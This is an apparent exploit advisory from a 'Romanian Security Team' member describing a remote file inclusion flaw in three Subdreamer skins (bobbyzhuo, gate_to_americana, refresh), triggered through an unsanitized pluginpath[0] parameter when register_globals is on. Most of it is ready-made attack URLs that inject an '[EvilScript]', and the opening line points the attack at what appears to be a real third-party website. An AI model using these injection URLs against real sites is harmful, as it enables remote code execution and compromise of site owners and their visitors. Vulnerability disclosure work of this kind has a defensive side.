exemplu: http://www.luchino.com.br/skins/bobbyzhuo/bobby1.php?pluginpath[0]=teeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee --------------------------------------------------------------------------- Subdreamer templates - Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By fluffy_bunny [ Romanian Security Team ] : hTTp://RSTZONE.NET : Remote : Yes Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subdreamer Skins: 1.bobbyzhuo 2.gate_to_americana 3.refresh ------------------------------------------------------------------ Exploit: ~~~~~~~ Variable $pluginpath[0] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. # http://www.site.com/[path]/skins/bobbyzhuo/bobby1.php?pluginpath[0]=[EvilScript] # http://www.site.com/[path]/skins/gate_to_americana/gta1.php?pluginpath[0]=[EvilScript] # http://www.site.com/[path]/skins/refresh/design1.php?pluginpath[0]=[EvilScript] --------------------------------------------------------------------------- */ Contact: ~~~~~~~ Nick: fluffy_bunny Homepage: hTTp://RSTZONE.NET [ in construction ] /* -------------------------------- [ EOF] ----------------------------------